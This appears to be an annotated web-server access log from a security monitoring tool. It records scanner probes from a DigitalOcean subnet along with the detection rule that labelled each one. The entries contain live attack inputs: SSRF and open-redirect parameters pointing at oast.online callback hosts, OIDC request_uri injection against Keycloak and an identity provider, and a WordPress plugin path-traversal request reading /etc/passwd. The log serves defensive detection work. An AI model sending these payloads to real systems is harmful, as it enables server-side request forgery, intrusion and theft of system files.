geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#29 2025-03-10 00:44:11 event 3081393 GET 404 bytes 7900

ann base label observed

Request event observed

/registry/machine?app=cFW3h&appType=0&version=0&hostname=2kxqm&ip=cv70744c1utej8crv3gg14jtcptptz1jz.oast.online&port=0

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/registry/machine?app=cFW3h&appType=0&version=0&hostname=2kxqm&ip=cv70744c1utej8crv3gg14jtcptptz1jz.oast.online&port=0

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#30 2025-03-10 00:44:10 event 3081392 GET 200 bytes 7219

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/?u=http://cv70744c1utej8crv3ggdtt4ny7kgecno.oast.online/&href=http://cv70744c1utej8crv3ggoz4exqi979mhr.oast.online/&action=http://cv70744c1utej8crv3gg5ck8icnq7wmgt.oast.online/&h…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/?u=http://cv70744c1utej8crv3ggdtt4ny7kgecno.oast.online/&href=http://cv70744c1utej8crv3ggoz4exqi979mhr.oast.online/&action=http://cv70744c1utej8crv3gg5ck8icnq7wmgt.oast.online/&host=cv70744c1utej8crv3ggtgro1fa99nc98.oast.online&http_host=cv70744c1utej8crv3ggyuwsmknqcip8y.oast.online&email=root@cv70744c1utej8crv3ggir7gpqtbmt5ni.oast.online&url=http://cv70744c1utej8crv3ggn61ihpb49oop5.oast.online/&load=http://cv70744c1utej8crv3gg5xmg1oga8iz61.oast.online/&preview=http://cv70744c1utej8crv3ggh6iecymkujif7.oast.online/&target=http://cv70744c1utej8crv3gggo1tqnjsk6rx1.oast.online/&proxy=http://cv70744c1utej8crv3gga86k6bznxdqc6.oast.online/&from=http://cv70744c1utej8crv3ggpazyir5n6hj7d.oast.online/&src=http://cv70744c1utej8crv3gg3ofh5io7q66zy.oast.online/&ref=http://cv70744c1utej8crv3gg7qzm4w4uni7ow.oast.online/&referrer=http://cv70744c1utej8crv3ggdttoyykbwiubh.oast.online/

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#31 2025-03-10 00:44:10 event 3081392 GET 200 bytes 7219

ann base label observed

Request event observed

/?u=http://cv70744c1utej8crv3ggdtt4ny7kgecno.oast.online/&href=http://cv70744c1utej8crv3ggoz4exqi979mhr.oast.online/&action=http://cv70744c1utej8crv3gg5ck8icnq7wmgt.oast.online/&h…

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#32 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896

ann ref 8 label ref

Request Multiple redirect parameters observed in one request

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

Annotation facts

label

ref

rule

ref:multi_redirect_chain

conf

80.00

details

Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.

More (full fields + snapshot) expand

url

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

summary

Multiple redirect parameters observed in one request

details

Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#33 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#34 2025-03-10 00:44:09 event 3081388 GET 404 bytes 7900

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/render.html?url=https://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/render.html?url=https://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#35 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900

ann cred 10 label cred

Request Auth request appears to use an automation-oriented user agent

/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744…

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

Annotation facts

label

cred

rule

cred:scripted_user_agent

conf

70.00

details

Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.

More (full fields + snapshot) expand

url

/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744c1utej8crv3gg97azy51idrgxm.oast.online/

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

summary

Auth request appears to use an automation-oriented user agent

details

Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#36 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900

ann cred label cred

Request Auth endpoint request observed

/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744…

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

Annotation facts

label

cred

rule

cred:auth_hit:oauth_oidc

conf

55.00

details

Row-level auth primitive for downstream aggregation (no velocity logic here).

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

summary

Auth endpoint request observed

details

Row-level auth primitive for downstream aggregation (no velocity logic here).

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#37 2025-03-10 00:44:09 event 3081391 GET 404 bytes 7896

ann base label observed

Request event observed

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/composer/send_email?to=FBkF@OabH&url=http://cv70744c1utej8crv3ggr9zyfuyngtwzn.oast.online

referer

Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#38 2025-03-10 00:44:09 event 3081390 GET 404 bytes 7900

ann base label observed

Request event observed

/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://cv70744…

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

referer

Mozilla/5.0 (Debian; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#39 2025-03-10 00:44:09 event 3081389 GET 404 bytes 7897

ann base label observed

Request event observed

/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://cv70744c1utej8crv3ggw5pwryj7r9h61.oast.online%23.salesforce.com/

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/service/error/sfdc_preauth.jsp?session=s&userid=1&server=http://cv70744c1utej8crv3ggw5pwryj7r9h61.oast.online%23.salesforce.com/

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.22

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#40 2025-03-10 00:44:09 event 3081388 GET 404 bytes 7900

ann base label observed

Request event observed

/render.html?url=https://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/render.html?url=https://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#41 2025-03-10 00:44:08 event 3081385 GET 404 bytes 7897

ann ref 9 label ref

Request Open-redirect style parameter points to an external URL

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Annotation facts

label

ref

rule

ref:open_redirect_param

conf

85.00

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

More (full fields + snapshot) expand

url

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

summary

Open-redirect style parameter points to an external URL

details

A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#42 2025-03-10 00:44:08 event 3081385 GET 404 bytes 7897

ann base label observed

Request event observed

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live

referer

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#43 2025-03-10 00:44:08 event 3081384 GET 404 bytes 7899

ann base label observed

Request event observed

/api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.cv70744c1utej8crv3ggpwjp4whkd5wpn.oast.online/

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/api/webdav/chatgpt-next-web/backup.json?endpoint=https://webdav.yandex.com.cv70744c1utej8crv3ggpwjp4whkd5wpn.oast.online/

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#44 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898

ann cred 10 label cred

Request Auth request appears to use an automation-oriented user agent

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

Annotation facts

label

cred

rule

cred:scripted_user_agent

conf

70.00

details

Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.

More (full fields + snapshot) expand

url

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

summary

Auth request appears to use an automation-oriented user agent

details

Automation-ish UA strings are useful correlates when paired with failures or spraying patterns.

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#45 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898

ann cred label cred

Request Auth endpoint request observed

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

Annotation facts

label

cred

rule

cred:auth_hit:oauth_oidc

conf

55.00

details

Row-level auth primitive for downstream aggregation (no velocity logic here).

More (full fields + snapshot) expand

url

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

summary

Auth endpoint request observed

details

Row-level auth primitive for downstream aggregation (no velocity logic here).

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#46 2025-03-10 00:44:07 event 3081383 POST 404 bytes 7899

ann base label observed

Request event observed

/AdminTools/querybuilder/logon?framework

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/AdminTools/querybuilder/logon?framework

referer

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.65

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#47 2025-03-10 00:44:07 event 3081382 GET 404 bytes 7898

ann base label observed

Request event observed

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://cv70744c1utej8crv3gg5memu48j46dmz.oast.online

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#48 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223

ann trav 30 label trav

Request Path traversal / LFI indicator detected

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

Annotation facts

label

trav

rule

trav:wrapper

conf

94.00

details

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

summary

Path traversal / LFI indicator detected

details

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#49 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223

ann sfp 44 label sensitive_file

Request Probe for OS credential/secret file

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

Annotation facts

label

sensitive_file

rule

sfp:file:os_secrets

conf

94.00

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

summary

Probe for OS credential/secret file

details

Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

#50 2025-03-10 00:44:06 event 3081381 GET 200 bytes 7223

ann base label observed

Request event observed

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?p=3232&wp_automatic=download&link=file:///etc/passwd

referer

Mozilla/5.0 (CentOS; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0

summary

event observed

details

—

subnet

68.183.143.0/24

asn

14061 — DigitalOcean, LLC

geo

United States, New Jersey, North Bergen

org

DigitalOcean, LLC

Log Explorer

Annotated access events

Confirm Action